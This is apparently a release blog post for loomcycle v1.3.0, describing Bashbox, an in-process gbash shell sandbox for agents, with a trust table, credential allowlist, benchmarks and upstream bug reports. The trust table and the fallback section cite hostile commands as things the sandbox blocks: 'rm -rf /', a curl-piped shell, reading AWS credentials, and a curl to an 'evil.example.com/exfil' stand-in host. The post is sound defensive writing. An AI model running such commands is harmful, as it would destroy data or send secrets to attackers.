§ release

Bashbox: an in-process shell sandbox for agents. And what the bench told us about gbash speed.

2026-07-04 · by Dennis Gubsky · ~11 min read

Every previous loomcycle release shipped with the same honest disclaimer on the Bash tool: restricted, not isolated. The four knobs the runtime applies (cwd, scrubbed env, output bounds, wall-clock timeout) are real, but they don't change what the host kernel lets the loomcycle process do. An agent that calls Bash can cat /etc/passwd, can curl arbitrary hosts, can spawn child processes that inherit the runtime's UID. If a deployment cares about real isolation, the existing advice has been to put the whole runtime inside a container or VM.

v1.1.0 (Filesystem Volumes, RFC AH) made the asymmetry visible. Read / Write / Edit / Glob / Grep all started honoring per-agent read-only volume bindings. Bash didn't, and the docs said so explicitly: rule #7 in the runtime CLAUDE.md is "Bash refuses read-only volumes rather than ship a guarantee a shell can't keep." A read-only volume mode on Bash would be a lie, because a child sh process can cd anywhere it has filesystem permission and the host kernel sees the agent's UID, not loomcycle's enforcement.

Today's v1.3.0 closes that gap without touching the existing tool. The fix is a new opt-in tool called Bashbox, backed by gbash, a pure-Go shell interpreter that runs scripts in-process: no os/exec, no /bin/sh, no host process spawned at all. Path resolution stays inside the bound volume because there is no host kernel doing the resolving. The read-only mode is honestly enforceable because the write overlay is in RAM.

v1.3.0 ships Bashbox (RFC AJ). A new opt-in shell tool. In-process execution via gbash (Apache-2.0, pure-Go). No OS process spawned. Path-rooted at the bound volume. No network. Read-only volumes honored via an in-RAM write overlay. Opt-in twice: LOOMCYCLE_BASHBOX_ENABLED=1 per deployment, allowed_tools: [Bashbox] per agent. Stateless per call. Bundles pure-Go awk and jq on top of gbash's built-in coreutils. An operator-only host-command fallback (RFC AJ §13) lets named commands (git, gh) reach the real host shell with a credential allowlist scoped only to the host child. gbash is alpha and pinned to an exact version; the per-agent gate is the escape hatch.

The rest of this post: the shape of the new tool, the trust posture, the operator-opt-in fallback, the bench (exp10) we ran against /bin/sh, and the three issues we filed upstream to gbash.

The shape

Bashbox is a new tool in the registry. It is not a backend for the existing Bash tool. Operators add Bashbox alongside or instead of Bash in an agent's allowed_tools:

agents:
  reviewer:
    allowed_tools: [Read, Write, Grep, Glob, Bashbox]
    volumes: [repo-a, shared-ro]

Same input schema as Bash (a script string, plus the optional volume arg from RFC AH). Same tool_call / tool_result event types on the wire, so no new transport plumbing and no adapter changes. The existing @loomcycle/client (TypeScript) and loomcycle (Python) adapters already speak the right shape; v1.3.0 intentionally ships no new client release.

Bashbox executes inside the same Go process as the runtime. No fork, no execve. The script runs through gbash's interpreter, which dispatches to a registry of pure-Go command implementations (its own ls, cat, grep, find, sed, cp, mv, rm, tar, the usual coreutils). Unknown commands do not fall through to host binaries by default. If a script invokes kubectl, gbash refuses; if it invokes git, gbash also refuses unless the operator has enabled the explicit fallback covered below.

Two pure-Go contrib packages ship on top of the gbash builtins: awk and jq. Both are common in real agent scripts. Adding them at the loomcycle layer kept the bundle predictable: the operator opts in to Bashbox and gets a known set of commands, with no host PATH entries leaking into the command surface.

Stateless per call

Each Bashbox invocation gets a fresh interpreter. No shared environment variables between calls, no cd persistence, no aliases inherited from a previous call. If an agent runs cd /work; ls in one call, the next call starts at the workspace root again. This matches how operators reason about the trust boundary: each call is a clean slate, the agent can't accumulate state via the shell.

gbash also supports a persistent Session shape (state survives across Exec calls). v1.3.0 doesn't expose that. The decision was a one-line trade-off: stateless calls make the audit trail easier to reason about, and the cost is that scripts that genuinely want state pass it explicitly (write to a file in the volume, read it next call). Persistent sessions are tracked as a future capability and will land if real agent workflows ask for them.

The trust posture

Bashbox is the first Bash-shaped tool whose isolation claim is the same shape as the rest of the file tools. The trust-table version:

Concern	Bash (existing)	Bashbox (new)
`rm -rf /`	Limited only by the runtime's UID	Limited to the in-RAM write overlay; the host base is read-only on a `ro` volume
Outbound network from a script	Subject to the HTTP allowlist for tools that route through it; raw `curl` bypasses	Blocked by default in gbash; no `curl` binary exists in the registry
`/bin/bash -c "$(curl ...)"`	Spawns a child that inherits the runtime UID	gbash refuses; no shell-out path exists
`cd ../../; ls`	Limited only by cwd setting plus host FS permissions	Refused by gbash's workspace boundary
Read a credential file outside the volume	Possible via `cat /home/user/.aws/credentials`	Refused; that path doesn't exist in the gbash workspace
Resource exhaustion	Wall-clock timeout plus output bound	Same, plus gbash's per-execution budgets on command count, loop count, output bytes
Read-only volume binding	Refused at config time (rule #7)	Accepted; writes go to the in-RAM overlay and never touch the host tree

The read-only overlay is the load-bearing piece. When a Bashbox call binds a ro volume, gbash mounts the host directory read-only as the base. Writes during the call land in a separate in-memory write layer that's discarded when the call ends. A script can touch /work/scratch.tmp inside the run and the file appears in subsequent operations within the same call, but the host filesystem never sees the write. The agent's blast radius on a ro volume is honestly bounded to the call's memory.

Two genuinely new concerns deserve an honest flag. The first: gbash is alpha-tagged upstream, and the project's own threat model says explicitly that it is "not a hardened sandbox". For loomcycle this is acceptable because the outer trust boundary lives at the loomcycle layer (per-run credentials, scope gates, multi-tenant authz, the operator allowlist for Bashbox itself); gbash carries the in-process shell semantics, not the outer boundary. If a critical gbash bug surfaces, removing Bashbox from allowed_tools is the per-agent escape hatch, and toggling LOOMCYCLE_BASHBOX_ENABLED=0 is the deployment-wide one.

The second concern is command coverage. gbash reports 62% on the full GNU coreutils conformance suite, 87% on the runnable subset. A coverage spike against a real loomcycle script corpus (the actual Bash calls the existing exp1 / exp4 / exp7 / JobEmber.ai agents have produced) measured roughly 97% identical-or-equivalent output. The remaining 3% is the source of the issues filed upstream and covered below.

The host-command fallback (RFC AJ §13)

The 3% gap matters in practice. Real loomcycle agents call git clone, git status, gh pr list. None of those have a pure-Go equivalent the operator wants to ship inside the sandbox. The pragmatic answer in v1.3.0 is an operator-only escape valve.

Two environment knobs gate the fallback:

# Off by default. Naming specific commands opts them in:
LOOMCYCLE_BASHBOX_FALLBACK_COMMANDS=git,gh

# Off by default. Naming specific env vars opts them into the host child only:
LOOMCYCLE_BASHBOX_FALLBACK_ALLOWED_ENV=GH_TOKEN,HOME,SSH_AUTH_SOCK

Only the commands in the first list escape to the real host shell. Every other command in the same script still runs inside the gbash sandbox. So git status; curl https://evil.example.com/exfil runs git on the host and refuses curl in the sandbox. There is no smuggling escape: the script can't shell out via a fallback command to launch another command (the fallback proxy executes exactly the named binary, not a shell that re-parses).

The credential allowlist is the other half. Variables in FALLBACK_ALLOWED_ENV are injected into the host child's environment only. The sandbox env never sees them. A script that runs env inside Bashbox sees the sandbox's empty/minimal environment; the same script that runs git push sees GH_TOKEN because git is the host child, not the sandbox. The model can't read credentials through the sandbox's env, but git can use them to authenticate.
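The allowlist rule above amounts to building the host child's environment from scratch rather than inheriting the runtime's. A minimal sketch, assuming a helper named hostChildEnv (hypothetical, not loomcycle's code) and a lookup function with the same signature as os.LookupEnv:

```go
package main

import (
	"fmt"
	"sort"
)

// hostChildEnv builds the environment for a fallback host child from an
// allowlist. Only allowlisted names that are actually set are passed through;
// everything else in the runtime's environment is left out.
func hostChildEnv(allow []string, lookup func(string) (string, bool)) []string {
	var env []string
	for _, name := range allow {
		if v, ok := lookup(name); ok {
			env = append(env, name+"="+v)
		}
	}
	sort.Strings(env) // deterministic order for logging and tests
	return env
}

func main() {
	// Illustrative values only; a real caller would pass os.LookupEnv.
	runtimeEnv := map[string]string{
		"GH_TOKEN":              "example-token",
		"HOME":                  "/home/agent",
		"AWS_SECRET_ACCESS_KEY": "not-allowlisted",
	}
	lookup := func(k string) (string, bool) { v, ok := runtimeEnv[k]; return v, ok }

	fmt.Println(hostChildEnv([]string{"GH_TOKEN", "HOME", "SSH_AUTH_SOCK"}, lookup))
}
```

In a real runtime the returned slice would be assigned to the Env field of the exec.Cmd for the host child, so the child sees exactly these variables and nothing inherited.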

A fallback command requires a read-write volume. A host process can't honestly honor the in-RAM read-only overlay, so requesting fallback on a ro volume refuses with an explicit error. The host child's working directory maps to the host path of the script's current directory, containment-checked against the volume's host root. A loud warning fires at boot when either knob is configured.

The fallback is intentionally narrow. Operators who need git get git; operators who don't, don't carry it. The default deployment has zero fallback commands and zero credentials reachable from the sandbox.

exp10: benching gbash against /bin/sh

Honest disclosure on performance. gbash's commands are pure-Go reimplementations of coreutils; /bin/sh dispatches to native C binaries that have had decades of optimization. The expectation going in was that gbash would be slower, and the question was by how much. The exp10 bench measures it on a representative coding-agent corpus: a real loomcycle git clone, file counts, grep over the tree, line-count totals, large-file scan, directory-depth probe.

The corpus runs the same script twice: once via Bash (host /bin/sh), once via Bashbox (gbash, with git in the §13 fallback). Both modes get a fresh ephemeral volume (RFC AH) per run. The numbers are wall-clock milliseconds; each op carries about 30ms of Python-subprocess overhead from the harness, which I've left in (it's constant across both modes).

Operation	Bash (ms)	Bashbox (ms)	Δ (ms)	Δ%	Notes
`cleanup`	248	556	+308	+124%
`git_clone`	357	409	+52	+15%	RFC AJ §13 fallback
`ls_root`	n/a	61			Bashbox only (sanity check)
`count_all_files`	55	104	+49	+89%	output mismatch (see below)
`count_go_files`	67	92	+25	+37%
`count_funcs`	155	636	+481	+310%
`total_loc`	1342	631	−711	−53%	gbash faster
`grep_rfc_aj`	278	782	+504	+181%
`large_files`	50	87	+37	+74%
`dir_depth`	68	86	+18	+26%
TOTAL	2968	3875	+907	+31%

Headline: 31% slower on the total wall-clock. Mixed per-op: most operations slower (the worst case is count_funcs at +310%, a grep -c across the tree), one operation faster (total_loc, a wc -l aggregate, at −53%). The git_clone step is only 15% slower because almost all the work is the real git binary via the §13 fallback; the gbash overhead is the cost of crossing the proxy.
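For readers checking the table, the Δ and Δ% columns follow from the two timing columns with the Bash run as the baseline. A small sketch of that arithmetic, using three rows copied from the table (the delta helper is illustrative, not part of the exp10 harness):

```go
package main

import (
	"fmt"
	"math"
)

// delta returns the absolute difference in ms and the percentage change
// relative to the Bash baseline, rounded to the nearest whole percent.
func delta(bashMs, bashboxMs int) (int, int) {
	d := bashboxMs - bashMs
	pct := int(math.Round(float64(d) / float64(bashMs) * 100))
	return d, pct
}

func main() {
	rows := []struct {
		op            string
		bash, bashbox int
	}{
		{"count_funcs", 155, 636},
		{"total_loc", 1342, 631},
		{"TOTAL", 2968, 3875},
	}
	for _, r := range rows {
		d, pct := delta(r.bash, r.bashbox)
		fmt.Printf("%-12s %+5d ms %+4d%%\n", r.op, d, pct)
	}
}
```

Note that Δ% is a change, not a ratio: +310% on count_funcs means the Bashbox run took about 4.1 times as long (636 / 155), and −53% on total_loc means it took a little under half the time.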

Output verification: four of five compared ops produced identical output. One didn't.

Operation	Bash output	Bashbox output	Match?
`count_all_files`	`1274`	`1193`	✗ mismatch
`count_go_files`	`708`	`708`	✓
`count_funcs`	`8119`	`8119`	✓
`grep_rfc_aj`	`167`	`167`	✓
`total_loc`	`232733`	`232733`	✓

The count_all_files mismatch (1274 vs 1193) is not a counting bug. It's a symptom of one of the gbash findings the bench surfaced: find aborts on a relative symlink in the cloned tree, and 81 files past that symlink never reach the count. The four other ops use different traversal patterns that don't hit the same path. The bench keeps the mismatch in the report rather than papering over it; an honest mismatch is what made the upstream issue concrete enough to file.

The verdict, plainly: gbash is slower than the host shell today, and the slowdown matters for tight inner loops. For a single-shot agent script that runs grep once and writes a few files, the absolute overhead (sub-second) is invisible. For a coding-agent fleet that calls find | grep across a 200k-line tree dozens of times per minute, the roughly 3-4x slowdown measured on the grep-heavy ops (count_funcs, grep_rfc_aj) adds up. Bashbox ships as opt-in so that trusted-dev deployments can stay on the existing Bash tool; Bashbox is the right choice when isolation matters more than peak throughput.

What we filed upstream

The bench surfaced three specific gbash issues worth filing rather than working around. All three are open as of release:

gbash#834 — find aborts on relative symlinks

gbash's find calls EvalSymlinks on every traversed path before the type filter runs. A relative symlink inside a cloned repo (the canonical case: a file like loomcycle.example.yaml → cmd/loomcycle/embedded/...) triggers a containment check that fails and aborts the rest of the traversal. The fix sits in gbash/fs/root_resolve_posix.go:resolveContainedSymlinkTarget: the followFinal=true path through ReadWriteFS.Stat follows every symlink unconditionally for type-checking, and the containment logic refuses the symlink before the -type f filter has a chance to skip it.

The workaround in the bench: use a shell glob dir/*/ to enumerate subdirectories explicitly, bypassing the top-level symlink. This is the right short-term fix for agent scripts that need find on real repos, but the right long-term fix is upstream.

gbash#835 — grep --include=GLOB missing

gbash's grep defines 21 options; --include and --exclude are not among them. Passing --include=*.go hits the unknown-option parser and exits with code 2. The internal enumerateRecursive() function in grep.go appends every encountered file unconditionally; there is no per-file glob filter in the implementation at all.

The fix is straightforward (add includeGlobs []string to grepOptions, register the option specs, filter in enumerateRecursive before appending). The workaround in agent scripts is the older pattern: find ... -name '*.go' | xargs grep -c ..., which works because the glob filter moves upstream into find. That workaround is fine, but it's a workaround.
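The per-file filter described above is small. The sketch below shows the general idea using Go's filepath.Match against the file's base name; it is not the upstream patch, matchesInclude and filterFiles are hypothetical names, and filepath.Match is only an approximation of the glob semantics GNU grep applies to --include.

```go
package main

import (
	"fmt"
	"path/filepath"
)

// matchesInclude reports whether a file should be searched. With no include
// globs every file passes; otherwise the base name must match at least one.
func matchesInclude(path string, includeGlobs []string) bool {
	if len(includeGlobs) == 0 {
		return true
	}
	base := filepath.Base(path)
	for _, g := range includeGlobs {
		// A malformed pattern returns an error and is treated as no match.
		if ok, err := filepath.Match(g, base); err == nil && ok {
			return true
		}
	}
	return false
}

// filterFiles stands in for the filtering step inside a recursive walk:
// the check runs before a path is appended to the list of files to search.
func filterFiles(paths, includeGlobs []string) []string {
	var kept []string
	for _, p := range paths {
		if matchesInclude(p, includeGlobs) {
			kept = append(kept, p)
		}
	}
	return kept
}

func main() {
	files := []string{"cmd/main.go", "README.md", "internal/tool/bashbox.go"}
	fmt.Println(filterFiles(files, []string{"*.go"}))
}
```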

gbash#836 — xargs -P silently falls back to serial

The most interesting of the three. gbash's xargs parses -P N correctly and stores opts.maxProcs, and the dispatcher in runXArgsTasks correctly routes to runXArgsTasksParallel when maxProcs > 1. But the parallel implementation is a stub that calls runXArgsTasksSequential immediately, with no diagnostic:

// xargs.go:884
func runXArgsTasksParallel(ctx context.Context, inv *Invocation, opts *xargsOptions, tasks []xargsTask) (int, error) {
    // The current runtime subexec path is not safe for concurrent inv.Exec calls,
    // so in the sandbox we preserve -P parsing and batching behavior but execute
    // the resulting commands serially.
    return runXArgsTasksSequential(ctx, inv, opts, tasks)
}

Reproducer: seq 4 | xargs -P 4 -I{} sleep 0.5 takes about 2 seconds (serial), not 0.5 (parallel). And xargs --show-limits reports Maximum parallelism: 2147483647, the math.MaxInt32 default, which compounds the misdirection.

The root cause is a genuine constraint rather than an oversight: the inv.Exec callback shares session-level state that isn't goroutine-safe, so concurrent calls would race. The fix is either a reentrant s.exec (complex; it mutates session state) or per-worker derived sessions. Until either lands, the right interim behavior is a stderr warning along the lines of "xargs: warning: -P N>1 not supported in this build, running serially".

Also affected: --process-slot-var always reads 0 because there's only one slot, so scripts that use the slot index as a sharding key get silent wrong answers.

One finding that didn't become an upstream issue

The bench also surfaced a code-js integration quirk worth documenting: Bashbox returns null (rather than an empty string) from a script with no stdout, which makes rm -rf foo && ...-style chains brittle in JS-shaped runners. The fix is on the loomcycle side (wrap the call result with || '' defensively in code-js scripts), not in gbash. It's logged in the exp10 report and will land in a follow-up commit to the bundled scripts.

The speed question

Bashbox at 31% slower is not the steady state. Two paths forward.

Upstream optimization. gbash is alpha and most of its commands have not been profiled against host-shell parity. The interpreter's command dispatch, the workspace overlay's stat path, the find traversal, the grep regex compile cache are all candidates. The three filed issues are the visible-correctness bugs; the speed gap is a separate body of work that the upstream maintainer is aware of and that I expect to close as the project moves out of alpha. The contrib bundle (the pure-Go awk and jq) is also where loomcycle has a direct upstream-PR path when a specific operation becomes load-bearing.

The opt-in posture is durable either way. Even if gbash never gets faster, Bashbox is the right choice for deployments that need real isolation (multi-tenant, untrusted-input workflows, JobEmber.ai-style production agents that handle user content). The existing Bash tool stays for trusted-dev workflows where the speed of the host shell matters more than isolation. Both tools coexist; operators pick per agent.

How to enable it

storage: ...        # unchanged from v1.2.0
runtime: ...

# v1.3.0: two new operator gates, both off by default
env:
  LOOMCYCLE_BASHBOX_ENABLED: "1"
  # optional: name specific host commands that may fall through:
  LOOMCYCLE_BASHBOX_FALLBACK_COMMANDS: "git,gh"
  # optional: name credentials the host child may see:
  LOOMCYCLE_BASHBOX_FALLBACK_ALLOWED_ENV: "GH_TOKEN,HOME,SSH_AUTH_SOCK"

agents:
  my-isolated-agent:
    allowed_tools: [Read, Write, Memory, Channel, Bashbox]  # ← Bashbox, not Bash
    volumes: [repo-a, shared-ro]

# Try exp10 directly:
git clone https://github.com/denn-gubsky/loomcycle
cd loomcycle/examples/exp10-gbash-bench
./run.sh

Full release notes in REVISIONS.md. The TS (@loomcycle/client) and Python (loomcycle) adapters are unchanged since v1.1.1; v1.3.0 intentionally ships no new @loomcycle/client release and no python-v1.3.0 because Bashbox is an in-band tool reachable on every transport and needs no wire-shape additions.

No breaking changes. The whole subsystem is additive and off-by-default; a deployment that doesn't set LOOMCYCLE_BASHBOX_ENABLED=1 sees zero behavior change. v1.0 / v1.1.x / v1.2.0 users can upgrade safely.

Companion reading: v1.2.0, SQL Memory for agents (the previous release, Memory's third facet); v1.1.0, Filesystem Volumes (RFC AH, the per-agent ro/rw roots Bashbox now honors); v1.0, substrate-complete (the baseline this all rides on).